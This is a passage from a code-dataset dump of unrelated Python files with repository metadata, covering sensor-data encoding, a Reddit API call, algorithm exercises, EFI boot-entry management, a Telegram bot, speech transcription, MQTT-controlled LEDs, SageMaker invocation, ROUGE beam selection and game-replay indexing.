print(score)\n\nmain()\n\n","repo_name":"DavoA/2Tasks","sub_path":"task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"21599750010","text":"from json.encoder import JSONEncoder\n\n\nclass EdgeUpdate(object):\n \"\"\"\n Represents a snapshot of the readings from\n the sensing node.\n \"\"\"\n\n def __init__(self, uuid, timestamp, temp, humidity, dht_temp, dht_humidity):\n self.uuid = uuid\n self.timestamp = timestamp\n self.temp = temp\n self.humidity = humidity\n self.dht_temp = dht_temp\n self.dht_humidity = dht_humidity\n\n def __str__(self) -> str:\n buffer = \"\"\n if self.temp:\n buffer += f\"Soil Temp:{self.temp}°C \"\n if self.dht_temp:\n buffer += f\"Air Temp:{self.dht_temp}°C \"\n if self.dht_humidity:\n buffer += f\"Air Humidity:{self.dht_humidity}%\"\n\n return buffer\n\n\ndef as_edge_update(msg_dict: dict):\n update_uuid = msg_dict.get(\"uuid\")\n timestamp = msg_dict.get(\"epoch\")\n temp = msg_dict.get(\"temp\")\n humidity = msg_dict.get(\"humidity\")\n dht_temp = msg_dict.get(\"dhtT\")\n dht_humidity = msg_dict.get(\"dhtH\")\n\n return EdgeUpdate(update_uuid, timestamp, temp, humidity, dht_temp, dht_humidity)\n\n\nclass EdgeUpdateEncoder(JSONEncoder):\n def default(self, update: EdgeUpdate):\n if not isinstance(update, EdgeUpdate):\n return JSONEncoder.default(self, update)\n\n json_obj = {}\n air_json = self.encode_dht(update)\n if air_json:\n json_obj[\"air\"] = air_json\n\n soil_json = self.encode_soil(update)\n if soil_json:\n json_obj[\"soil\"] = soil_json\n\n if not (air_json or soil_json):\n return None\n\n node_json = {}\n node_json[\"data\"] = json_obj\n node_json[\"timestamp\"] = update.timestamp\n node_json[\"uuid\"] = update.uuid\n return node_json\n\n def encode_dht(self, update: EdgeUpdate):\n if not (update.dht_temp or update.dht_humidity):\n return\n\n air = {}\n if update.dht_humidity:\n air[\"humidity\"] = update.dht_humidity\n if update.dht_temp:\n air[\"temp\"] = update.dht_temp\n\n return air\n\n def encode_soil(self, update: EdgeUpdate):\n if not (update.temp or update.humidity):\n return\n\n soil = {}\n if update.humidity:\n soil[\"humidity\"] = update.humidity\n if update.temp:\n soil[\"temp\"] = update.temp\n\n return soil\n","repo_name":"shakram02/plant-watcher-fog","sub_path":"edge/status.py","file_name":"status.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"70634796105","text":"#!/usr/bin/python3\n\"\"\"Gets the total of subscribbers of a subreddit\"\"\"\nfrom requests import get\n\n\ndef number_of_subscribers(subreddit):\n '''\n Takes the subreddit as an argument and returns the count of subscribers\n '''\n base_url = 'https://www.reddit.com/r/'\n headers = {'User-Agent': 'my-app/0.0.1'}\n\n url = f\"{base_url}{subreddit}/about.json\"\n request = get(url, headers=headers, allow_redirects=False)\n\n if request.status_code != 200:\n return 0\n\n try:\n data = request.json()\n except ValueError:\n return 0\n\n data = data.get('data')\n if data:\n sub_count = data.get('subscribers')\n if sub_count:\n return sub_count\n\n return 0\n","repo_name":"Alph-aine/alx-system_engineering-devops","sub_path":"0x16-api_advanced/0-subs.py","file_name":"0-subs.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74319524425","text":"'''\nGiven an integer array B of size N. You need to find the Ath \nlargest element in the subarray [1 to i], where i varies from 1 to N. \nIn other words, find the Ath largest element in the sub-arrays \n[1 : 1], [1 : 2], [1 : 3], ...., [1 : N].\n\nNOTE: If any subarray [1 : i] has less than A elements, then the output should be -1 at the ith index.\n'''\n\nfrom heapq import heappop,heappush\nclass Solution:\n # @param A : integer\n # @param B : list of integers\n # @return a list of integers\n def solve(self, A, B):\n\n #create a min heap\n min_heap=[]\n\n #answer array\n answer=[]\n\n #iterate for the A elements\n for index in range(A):\n #push the element in the min heap\n heappush(min_heap,B[index])\n answer.append(-1)\n \n #add answer array\n answer.pop()\n answer.append(min_heap[0])\n\n #iterate for the other values in the index\n for index in range(A,len(B)):\n #get the value at the index\n value=B[index]\n #compare it withe value in min heap\n if value>min_heap[0]:\n #push the minimum element\n heappop(min_heap)\n #add the element\n heappush(min_heap,value)\n #add answer array\n answer.append(min_heap[0])\n \n #return the value\n return answer","repo_name":"SomilKSharma/AdvancedDSA","sub_path":"Heaps/kmax.py","file_name":"kmax.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4850933070","text":"from clover_config.log import Log\nfrom clover_config.efibootmgr import EFIBootManager\nfrom clover_config.config import Config\n\nEFI_ENTRY_LABEL = \"Clover\"\nEFI_ENTRY_LOADER = \"/EFI/CLOVER/CLOVERX64.efi\"\n\ndef install ():\n EFIBootManager.try_remove_boot_entry (EFI_ENTRY_LABEL)\n\n if Config.EFIDefault:\n boot_order = EFIBootManager.get_boot_order ()\n\n EFIBootManager.add_boot_entry (EFI_ENTRY_LABEL, EFI_ENTRY_LOADER)\n\n if Config.EFIDefault:\n bootnum = EFIBootManager.get_bootnum (EFI_ENTRY_LABEL)\n Log.install.info (\"Setting clover as the default EFI boot entry...\")\n if boot_order is None:\n boot_order = bootnum\n else:\n boot_order = \"{},{}\".format (bootnum, boot_order)\n EFIBootManager.set_boot_order (boot_order)\n\ndef remove ():\n EFIBootManager.try_remove_boot_entry (EFI_ENTRY_LABEL)\n\ndef status ():\n bootnum = EFIBootManager.get_bootnum (EFI_ENTRY_LABEL)\n boot_order = EFIBootManager.get_boot_order ().split (\",\")\n active = \"active\" if EFIBootManager.is_active (EFI_ENTRY_LABEL) else \"inactive\"\n if bootnum is None:\n Log.root.info (\"Clover is currently NOT installed in your EFI\")\n else:\n Log.root.info (\"Clover is currently installed at boot position %s and is %s.\", boot_order.index (bootnum), active)\n\ndef update ():\n pass\n\ndef check_efi ():\n EFIBootManager.check_efi ()\n\nActions = {\n \"status\": status,\n \"install\": install,\n \"remove\": remove,\n \"update\": update,\n \"check-efi\": check_efi\n}\n","repo_name":"fin-ger/clover-config","sub_path":"clover_config/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"38791959557","text":"import telegram as tel\nfrom env import TELEGRAM_TOKEN\n\n\nclass TelegramBot:\n def __init__(self, chat_id):\n self.bot = tel.Bot(token=TELEGRAM_TOKEN)\n self.log_queue = []\n self.chat_id = chat_id\n\n def log(self, msg):\n self.log_queue.append(str(msg))\n\n def clear_logs(self):\n self.log_queue = []\n\n def send_logs(self):\n if len(self.log_queue) == 0:\n return\n\n joined_log = \"\\n\".join(self.log_queue)\n if len(joined_log) > 1990:\n full_msg = f\"\"\"{joined_log[:1990]}...\"\"\"\n else:\n full_msg = f\"\"\"{joined_log}\"\"\"\n\n self.bot.sendMessage(chat_id=self.chat_id, text=full_msg)\n self.log_queue = []\n\n\nif \"__main__\" == __name__:\n telegram_bot = TelegramBot(chat_id=-1001564791306)\n telegram_bot.log(\"qve to the moon\")\n telegram_bot.send_logs()\n","repo_name":"happysms/kimp_socket","sub_path":"alert/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"81"} +{"seq_id":"12247222396","text":"__time__ = '2021/9/14'\n__author__ = 'ZhiYong Sun'\n\n'''\nsql\n学生表:姓名,学号,班级\n成绩表:学号,学科,得分\n教师表:班级,教师姓名\n查询: 教师所有班级每个学科的平均得分\n\n\nselect 学生表.班级, 成绩表.学科, avg(成绩表.得分)\nFrom 学生表, 成绩表\ngroup by 学生表.班级, 成绩表.学科\nwhere 学生表.学号=成绩表.学号 and 学生表.班级 in (select 班级 where 教师姓名=给定名字 from 教师表)\n\n'''\n","repo_name":"Darius-sss/LeetCode","sub_path":"面试笔试/2022校招笔试面试题/2021-9-14--携程一面.py","file_name":"2021-9-14--携程一面.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74787975944","text":"##\n# Student.py\n# Student class for demo\n#\n# @package\tLearnCode\n# @author\t\tDimas Wicaksono\n# @since\t\t2018-51-25\n##\n\nclass Student:\n\n # constructor\n def __init__(self, name, major, gpa, is_on_probation):\n self.name = name\n self.major = major\n self.gpa = gpa\n self.is_on_probation = is_on_probation\n\n\n def on_honor_roll(self):\n if self.gpa >= 3.50:\n return True\n else:\n return False","repo_name":"diazinmotion/LearnCode","sub_path":"Python/Part I/12. Class & Object/Student.py","file_name":"Student.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74492951626","text":"import speech_recognition as sr\nimport pyttsx3 as pyx\nfrom random import choice\nfrom config import *\n\n\nreproducao = pyx.init()\n\n\n#Função para sair o som\ndef sai_som(resposta):\n reproducao.setProperty('voice','brazil+f4')\n reproducao.setProperty('rate',140)\n reproducao.setProperty('volume', 1)\n reproducao.say(resposta)\n reproducao.runAndWait()\n\ndef assistente():\n #Realizando loop da fala e reconhecimento de voz\n print(boas_vindas)\n sai_som(boas_vindas)\n while True:\n resposta_erro_aleatoria = choice(lista_erro)\n recon = sr.Recognizer()\n\n #Abrindo o microfone\n with sr.Microphone() as source:\n \n recon.adjust_for_ambient_noise(source,duration=3)\n \n while True:\n try:\n\n #Ouvindo o usuário\n audio = recon.listen(source)\n user_name = recon.recognize_google(audio,language='pt-br')\n user_name = verificar_nome(user_name)\n name_list()\n apresentacao = \"{}\".format(verificar_nome_exist(user_name))\n print(apresentacao)\n sai_som(apresentacao)\n\n #guardando o nome completo\n brute_user_name = user_name\n user_name = user_name.split(\" \")\n user_name = user_name[0]\n break\n except sr.UnknownValueError:\n sai_som(resposta_erro_aleatoria)\n break\n\n print(\"=\"*len(apresentacao))\n print(\"Ouvindo...\")\n while True:\n \n resposta_erro_aleatoria = choice(lista_erro)\n recon = sr.Recognizer()\n\n #Abrindo o microfone\n with sr.Microphone() as source:\n recon.adjust_for_ambient_noise(source,duration=3)\n \n while True:\n try:\n #Ouvindo o usuário\n audio = recon.listen(source)\n entrada = recon.recognize_google(audio,language='pt-br')\n print(\"{}: {}\".format(user_name,entrada))\n \n resposta = tipo_funcao(entrada)\n\n print('Assistente: {}'.format(resposta))\n sai_som(resposta)\n\n except sr.UnknownValueError:\n sai_som(resposta_erro_aleatoria)\n\nif __name__=='__main__':\n intro()\n sai_som(\"Iniciando...\")\n assistente()","repo_name":"Gabr1el94/Python","sub_path":"automacao-bot/assistente-virtual/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35004722007","text":"# importing libraries \nimport speech_recognition as sr; import os; from pydub import AudioSegment \nimport io; from scipy.io.wavfile import write; import numpy as np\n#from pydub.silence import split_on_silence \nfrom pydub.utils import make_chunks; import re; from google.cloud import storage\n\ndef length(fname): #finding the length of audio file\n\tstorage_client = storage.Client()\n\tbucket = storage_client.get_bucket('awesome-bucketness')\n\tbb = bucket.get_blob(fname) #Retrieve blob after uploading to GCS\n\tbblength = bb.download_as_string()\n\taudio = AudioSegment.from_file(io.BytesIO(bblength), format=re.split('\\.', fname)[1]) #also good with wav, m4a, ogg\n\tif audio is None: #var = os.system(\"ffmpeg -i /Users/catherineng/Downloads/0aeaedfc-b0ee-4ad1-a6b7-85ed8e588400.ogg -loglevel quiet -stats -f null - 2>&1 | awk '{print $2}' | sed s/://g | sed s/[a-z]//g | sed s/=//g\")\n\t\tvar = system(\"ffmpeg -i \" + fname + \" -loglevel quiet -stats -f null - 2>&1 | awk '{print $2}' | sed s/://g | sed s/[a-z]//g | sed s/=//g\")\n\t\treturn var\n\telse: \n\t\treturn audio.duration_seconds #return audio.info.length\n\t\ndef transcribe_audio(f, name, lang):\n\tsong = AudioSegment.from_file(io.BytesIO(f), re.split('\\.', name)[1])\n\taudio_chunk = np.array(song.get_array_of_samples()) #convert it to array.array\n\taudio_chunk = audio_chunk.reshape(song.channels, -1, order='F').T\n\toutput = io.BytesIO(); rate = song.frame_rate\n\twrite(output, rate, audio_chunk)\n\tr = sr.Recognizer()\n\twith sr.AudioFile(output) as source:\n\t\taudio = r.record(source)\n\ttranscription = r.recognize_google(audio, language=lang) #class 'str'\n\treturn transcription\n\n# a function that splits the audio file into chunks and applies speech recognition \ndef silence_based_conversion(path, name, lang): \t\n\t# open the audio file stored in the local system as a wav file. \n\tsong = AudioSegment.from_file(io.BytesIO(path), format=re.split('\\.', name)[1])\n\t# move into the directory to store the audio files. #os.chdir('audio_chunks')\n\tchunks = make_chunks(song, 30000)\n\ttranscription = \"\"\n\t# process each chunk \n\tfor i, chunk in enumerate(chunks): \n\t\t\t\t\n\t\t# Create 0.5 (10/10000) seconds silence chunk \n\t\tchunk_silent = AudioSegment.silent(duration = 10) \n\t\n\t\t# add 0.5 sec silence to beginning and end of audio chunk. This is done so that it doesn't seem abruptly sliced. \n\t\taudio_chunk = chunk_silent + chunk + chunk_silent \n\t\taudio_chunk = audio_chunk.get_array_of_samples() #convert it to array.array\n\t\taudio_chunk= np.array(audio_chunk) #convert it to numpy.ndarray\n\t\t#print(audio_chunk.shape) #(5293748,)\n\t\taudio_chunk = audio_chunk.reshape(song.channels, -1, order='F').T #reshape to (num of samples, num of channels)\n\t\t#print(audio_chunk.shape) #(2, 2646874) --> (2646874, 2)\n\t\t#specify the bitrate to be 192 kbps #audio_chunk.export(\"./chunk\" + str(i) + \".wav\", format =\"wav\") \n\t\toutput = io.BytesIO()\n\t\t#audio_chunk.export(output, formsong.dtyat=\"wav\")\n\t\trate = song.frame_rate\n\t\twrite(output, rate, audio_chunk)\n\t\n\t\t# create a speech recognition object \n\t\tr = sr.Recognizer() \n\t\n\t\t# recognize the chunk \n\t\twith sr.AudioFile(output) as source: \n\t\t\t# remove this if it is not working correctly. \n\t\t\t#r.adjust_for_ambient_noise(source, duration=5) \n\t\t\t#audio_listened = r.listen(source) \n\t\t\taudio = r.record(source) \n\t\ttry: \n\t\t\t#try converting it to text \n\t\t\trec = r.recognize_google(audio, language=lang) #write the output to the file. #fh.write(rec+\". \") \n\t\t# catch any errors. \n\t\texcept sr.UnknownValueError: \n\t\t\treturn \"Could not understand audio\"\n\t\n\t\texcept sr.RequestError as e: \n\t\t\treturn \"Could not request results. check your internet connection\"\n\n\t\ttranscription += rec + \" \"\n\treturn transcription \n\t\n\t#os.chdir('..') \n\t\nif __name__ == '__main__': \n\tprint('Enter the audio file path') \n\tpath = input() \n\tsilence_based_conversion(path, 'en-US') \n","repo_name":"catherine8224/Transcribe_Audio","sub_path":"longaudio.py","file_name":"longaudio.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70335094024","text":"import paho.mqtt.client as mqtt\nimport os\nimport threading\nimport logging\nimport time\nimport unicornhathd as unicorn\n\nclass SharedContext:\n current_color = \"off\"\n\nshared_context = SharedContext()\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n client.subscribe(\"/pistatus/light/color\")\n\ndef on_message(client, userdata, msg):\n print(msg.topic+\" \"+str(msg.payload))\n shared_context.current_color = str(msg.payload.decode(\"utf-8\"))\n\n\ndef set_color(r,g,b):\n width,height=unicorn.get_shape()\n for y in range(height):\n for x in range(width):\n unicorn.set_pixel(x,y,r,g,b)\n unicorn.show()\n\ndef do_light_thing(context):\n unicorn.set_layout(unicorn.AUTO)\n unicorn.rotation(0)\n unicorn.brightness(.40)\n width,height=unicorn.get_shape()\n\n while True:\n if context.current_color == \"green\" :\n set_color(0,255,0)\n elif context.current_color == \"red\" :\n set_color(255,0,0)\n elif context.current_color == \"blue\" :\n set_color(0,0,255)\n elif context.current_color == \"yellow\" :\n set_color(255,255,0)\n else:\n unicorn.clear()\n unicorn.show()\n time.sleep(0.05)\n\nif __name__ == \"__main__\":\n\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n\n light_thread = threading.Thread(target=do_light_thing, args=(shared_context,))\n light_thread.daemon = True\n light_thread.start()\n\n mqtthost = os.environ.get(\"MQTT_HOST\")\n if mqtthost == None:\n raise Exception(\"Missing Environment Setting\",\"MQTT_HOST\")\n\n client.connect(mqtthost,1883,60)\n\n client.loop_forever()\n\n","repo_name":"CaseyMacPherson/UnicornPiStatus","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":1601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40839684311","text":"\"\"\"\nInvoke deployed endpoint\n\"\"\"\nimport sagemaker\nfrom sagemaker.predictor import csv_serializer, RealTimePredictor\nfrom sagemaker.content_types import CONTENT_TYPE_CSV, CONTENT_TYPE_JSON\n\nfrom ...sm_utils import parse_invoke_args\n\nif __name__ == \"__main__\":\n args = parse_invoke_args()\n ep_name = args.end_point\n sm_sess = sagemaker.Session()\n\n if (args.delete_ep):\n print(f'Deleting EndPoint {ep_name}')\n sm_client = sm_sess.boto_session.client('sagemaker')\n sm_client.delete_endpoint(EndpointName=ep_name)\n else:\n print(f'Invoking EndPoint {ep_name}')\n payload = 'M, 0.44, 0.365, 0.125, 0.516, 0.2155, 0.114, 0.155'\n actual_rings = 10\n\n predictor = RealTimePredictor(\n endpoint=ep_name,\n sagemaker_session=sm_sess,\n serializer=csv_serializer,\n content_type=CONTENT_TYPE_CSV,\n accept=CONTENT_TYPE_JSON\n )\n\n print(predictor.predict(payload))","repo_name":"chenwuperth/smworkshop","sub_path":"examples/07/inference/invoke_endpoint.py","file_name":"invoke_endpoint.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23237537680","text":"from rouge import Rouge \nimport argparse\nrouge = Rouge(['rouge-1'])\nimport string\nfrom tqdm import tqdm\n\ndef read_text(filename):\n with open(filename, 'r') as f:\n data = f.readlines()\n return data\n\ndef write_text(data, filename):\n with open(filename, 'w') as fout:\n for line in data:\n fout.write(line+'\\n')\n\ndef extract_content(text):\n cells = []\n text = text.replace('', '').replace('', '')\n for cell in text.split(''):\n if cell.strip() in ['', '[TABLECONTEXT]', '[title]']:\n continue \n if cell.strip() not in cells:\n cells.append(cell.strip())\n return ' '.join(cells)\n\ndef get_char_seq(sent):\n return ''.join([c for c in sent if c != ' ' and c not in string.punctuation and c.isascii()])\n\ndef recover_original_strings(outputs, inputs):\n new_outputs = []\n for i in range(len(inputs)):\n inputs[i] = inputs[i].replace('', '').replace('', '')\n cells = []\n for cell in inputs[i].split(''):\n if cell.strip() in ['', '[TABLECONTEXT]', '[title]']:\n continue \n if cell.strip() not in cells:\n cells.append(cell.strip().lower())\n sent = outputs[i]\n char_seq = [(c, i) for i, c in enumerate(sent) if c != ' ' and c not in string.punctuation and c.isascii()]\n chars = ''.join([c[0] for c in char_seq])\n indices = [c[1] for c in char_seq]\n\n replace_pairs = []\n for word in cells:\n if any([c in string.punctuation for c in word]) or not word.isascii():\n m_word = ''.join([c for c in word if c not in string.punctuation and c!= ' ' and c.isascii()])\n if len(m_word) == 0:\n continue\n occurs = chars.find(m_word)\n if occurs >= 0:\n target_start = indices[occurs]\n if occurs+len(m_word) < len(indices):\n target_end = indices[occurs+len(m_word)]\n else:\n target_end = len(sent)\n end_fail = False # Here, some punctuation in the end may also be removed, we bring them back\n while sent[target_end-1] != word[-1]:\n target_end -= 1\n if (sent[target_end-1] != ' ' and sent[target_end-1] not in string.punctuation and sent[target_end-1].isascii()):\n break\n if sent[target_end-1] != word[-1]:\n end_fail = True\n if end_fail:\n continue\n start_fail = False # Here we try to include punctuations that may appear in the begining\n while sent[target_start] != word[0]:\n target_start -= 1\n if (sent[target_start] not in string.punctuation and sent[target_start] != ' ' and sent[target_start].isascii()) or target_start <= 0:\n break\n if sent[target_start] != word[0]:\n start_fail = True\n if start_fail:\n continue\n target = sent[target_start:target_end]\n if len(get_char_seq(target)) != len(get_char_seq(word)):\n continue\n if target != word and (target, word) not in replace_pairs:\n if target_end < len(sent) and sent[target_end] != ' ':\n target += ' '\n word += ' '\n if target_start > 0:\n target = ' ' + target\n word = ' ' + word\n replace_pairs.append((target, word))\n for p in replace_pairs:\n sent = sent.replace(p[0], p[1])\n new_outputs.append(sent)\n return new_outputs\n\ndef process_one_file(output_filename, input_filename):\n sentences = read_text(output_filename)\n all_inputs = read_text(input_filename)\n selected_sentences = []\n emptytop1 = 0\n emptyin = 0\n for i in tqdm(range(len(sentences))):\n beams = sentences[i].split('|||')\n inputs = extract_content(all_inputs[i])\n beams[-1] = beams[-1].strip()\n if beams[0] == '':\n emptytop1 += 1\n if '' in beams:\n emptyin += 1\n try:\n scores_get = [(rouge.get_scores(s.lower(), inputs.lower()), b) for b, s in enumerate(beams)]\n scores_get.sort(key=lambda x: x[0][0]['rouge-1']['f'], reverse=True)\n sent = beams[scores_get[0][1]]\n except:\n print (inputs)\n sent = ''\n for beam in beams:\n if beam != '':\n sent = beam \n break\n recover_sent = recover_original_strings([sent], [all_inputs[i]])[0]\n selected_sentences.append(recover_sent)\n return selected_sentences\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--verbalizer_outputs\", default=None, type=str, required=False) \n parser.add_argument(\"--verbalizer_inputs\", default=None, type=str, required=False) \n args = parser.parse_args()\n selected_sentences = process_one_file(args.verbalizer_outputs, args.verbalizer_inputs)\n write_text(selected_sentences, args.verbalizer_outputs.replace('.txt', 'beam_selection.txt'))","repo_name":"Mayer123/UDT-QA","sub_path":"Verbalizer/post_processing.py","file_name":"post_processing.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"81"} +{"seq_id":"72807796745","text":"import sys\nsys.setrecursionlimit(100000)\n\ndef getShortest(graph, start, end) :\n '''\n graph가 주어질 때, start부터 end까지의 최단거리를 반환하는 함수를 작성하세요.\n '''\n # 정점의 개수\n V = len(graph)\n\n # 각 정점의 거리\n dist = [float('inf') for i in range(V)]\n # 방문했는지 확인\n visited = [False for i in range(V)]\n\n dist[start] = 0\n\n while True:\n mini = float('inf')\n node = -1\n for j in range(V):\n if visited[j] == False and dist[j] < mini:\n mini = dist[j]\n node = j\n if mini == float('inf'):\n break\n visited[node] = True\n\n for j in range(len(graph[node])):\n des = graph[node][j][0]\n cost = graph[node][j][1]\n\n if dist[des] > dist[node] + cost:\n dist[des] = dist[node] + cost\n return dist[end]\n\n\n\n\n\n return graph\n\ndef main():\n vertexs, edges, start, end = map(int, input().split())\n graph = [ [] for i in range(vertexs) ]\n\n for i in range(edges) :\n line = [int(x) for x in input().split()]\n graph[line[0]].append((line[1], line[2]))\n graph[line[1]].append((line[0], line[2]))\n print(getShortest(graph,start,end))\n\nif __name__ == \"__main__\":\n main()","repo_name":"fineman999/Algorithm","sub_path":"Elice/Graph/shortest_distance.py","file_name":"shortest_distance.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1410296465","text":"import os\nimport json\nfrom Parser import Decompiler, ParseFull, ParseHeader\nfrom DatabaseManager import DatabaseManager\nfrom pprint import pprint\nfrom tqdm import tqdm\n\nclass ReplayDatabaseManager:\n\n\tdefaultDatabasePath = 'ReplayDB.csv'\n\tdefaultDatabaseHeader = [ 'Path', 'Name', 'GUID']\n\n\tdef __init__(self, attributes):\n\t\tself.databaseManager = DatabaseManager()\n\t\tself.demoPathAttributes = attributes\n\t\tself.setAttributes()\n\t\tself.replayDict = {}\n\t\t\n\tdef setAttributes(self):\n\t\tself.replayList = self.demoPathAttributes[1]\n\t\tself.replayBatches = self.demoPathAttributes[4]\n\t\tself.singleBatch = self.demoPathAttributes[7]\n\n\tdef getReplayGUID(self, replay, parser):\n\t\ttry:\n\t\t\tjsonObject = Decompiler(replay).decompile(parser=parser, logTime=False)\n\t\t\tguid = ParseFull(jsonObject, parser).getGUID()\n\t\t\tif any(guid): return guid \n\t\t\telse: return 'None'\n\t\texcept:\n\t\t\treturn 'Error'\n\n\tdef getBatchGUIDs(self, batch):\n\t\tfor replay in batch:\n\t\t\treplay[2] = self.getReplayGUID(replay[0], 'boxcars')\n\t\treturn batch\n\n\tdef getReplayHeader(self, replay, parser):\n\t\tjsonObject = Decompiler(replay).decompile(parser=parser, logTime=False)\n\t\theader = ParseHeader(jsonObject).getHeaderData()\n\t\tif any(header): return header \n\t\telse: return 'None'\n\t\tpass\n\n\tdef getBatchHeaders(self):\n\t\tfor batch in tqdm(self.replayBatches, desc='Export progress: ', position=0):\n\t\t\tfor replay in tqdm(batch, desc='\tBatch progress: ', ncols=100, position=1):\n\t\t\t\tif os.path.getsize(replay[0]) > 30000:\n\t\t\t\t\ttry:\n\t\t\t\t\t\theader = self.getReplayHeader(replay[0], 'boxcars')\n\t\t\t\t\t\treplayName = self.sanitizeReplayName(replay[1])\n\t\t\t\t\t\tself.replayDict[replayName] = header\n\t\t\t\t\texcept:\n\t\t\t\t\t\treplayName = self.sanitizeReplayName(replay[1])\n\t\t\t\t\t\tself.replayDict[\"Error\"] = {replayName:'Error'}\n\t\t\n\t\theaderjson = self.dictToJson(self.replayDict)\n\t\tself.outputJSON(headerjson)\n\n\tdef sanitizeReplayName(self, replayName):\n\t\treturn replayName.replace('.replay', '')\n\n\tdef printAllGUIDs(self):\n\t\tfor batch in self.replayBatches:\n\t\t\tfor replay in batch:\n\t\t\t\tprint(\"GUID: \" + self.getReplayGUID(replay[0], 'boxcars'))\n\n\tdef exportReplayDatabase(self, header=defaultDatabaseHeader, path=defaultDatabasePath, sequential=True):\n\t\tif sequential:\n\t\t\tdata = []\n\t\t\tself.databaseManager.createBackupCSV(path)\n\t\t\tif not self.singleBatch:\n\t\t\t\tfor batch in tqdm(self.replayBatches, desc='Export progress: ', position=0):\n\t\t\t\t\tfor replay in tqdm(batch, desc='\tBatch progress: ', ncols=100, position=1):\n\t\t\t\t\t\treplay[2] = self.getReplayGUID(replay[0], 'boxcars')\n\t\t\t\t\t\treplay.append(replay.pop(0))\n\t\t\t\t\t\tdata.append(replay)\n\t\t\t\t\t\tself.databaseManager.write(data, header, path, False)\n\t\t\telse:\n\t\t\t\tfor replay in self.replayList:\n\t\t\t\t\treplay[2] = self.getReplayGUID(replay[0], 'boxcars')\n\t\t\t\t\treplay.append(replay.pop(0))\n\t\t\t\t\tdata.append(replay)\n\t\t\t\t\tself.databaseManager.write(data, header, path, False)\n\t\telse:\n\t\t\tdata = [y for x in self.replayBatches for y in x]\n\t\t\tself.databaseManager.write(data, header, path)\n\n\t\n\t\t#pprint(self.importedDatabase)\n\n\tdef dictToJson(self, dictData):\n\t\tdata = json.dumps(dictData)\n\t\tloadedData = json.loads(data)\n\t\treturn loadedData\n\n\tdef outputJSON(self, jsonObject):\n\t\twith open('Resources/data2.json', 'w') as outfile:\n\t\t json.dump(jsonObject, outfile, indent=4, separators=(',', ': '), sort_keys=True)\n\n \n\n","repo_name":"Xylot/Vextra","sub_path":"ReplayDatabaseManager.py","file_name":"ReplayDatabaseManager.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"6279602652","text":"# Новая задача глава 4, задача 13, под названием разработка\n\n# Напишите программу, которая подсчитывает количество ячеек в таблице, содержащий 5 строк и 2 столбца. При этом:\n\na=2\nb=5\nfor i in range(a):\n i+=1\n\n for j in range(b):\n j+=1\n print(i,' ',j)","repo_name":"Nurbek2405/TasksInPython","sub_path":"Chapter 4 task 13.py","file_name":"Chapter 4 task 13.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70568193545","text":"from logger import log\nfrom pathlib import Path\nfrom logger import FGColor\n\n# print(REVERSED + \"Hola\" + RESET)\n# print(BOLD + \"Hola\")\n# print(UNDERLINE + \"Hola\" + RESET)\n\nlog.error(\"An Error Occurred Unexpectedly\")\nlog.warning(\"Something strange is happening\")\nlog.success(\"Everything is working fine\")\nlog.info(\"Something is working...\")\n\nlog.enable_save_to_txt(path=Path.cwd())\nlog.enable_timestamp()\n\nlog.info(\"Some text\")\nlog.error(\"Some error\")\n\nlog.set_log_timestamp_format(\"[%H:%M]\")\n\nlog.info(\"Other text\")\n\nlog.color(FGColor.red, \" .----------------. \")\nlog.color(FGColor.green, \"| _ |\")\nlog.color(FGColor.yellow, \"| _.-'|'-._ |\")\nlog.color(FGColor.blue, \"| .__.| | | |\")\nlog.color(FGColor.magenta, \"| |_.-'|'-._| |\")\nlog.color(FGColor.cyan, \"| '--'| | | |\")\nlog.color(FGColor.white, \"| '--'|_.-'`'-._| |\")\nlog.color(FGColor.red, \"| '--' ` |\")\nlog.color(FGColor.green, \" '----------------'\")\n\n\n# example API usage\n\n# log.INFO(\"some text\") #prints \"[?] INFO: some text\" with colors\n# log.enable_save_to_txt(\"C:/SomeFolder\") #stars saving following logs to txt into path, if empty saves to class position\n# log.WARNING(\"something's happening\") #prints \"[!] WARNING: something's happening\" with colors both to cmd and to txt\n# log.enable_date_timestamp(\"dd/mm/yy\") 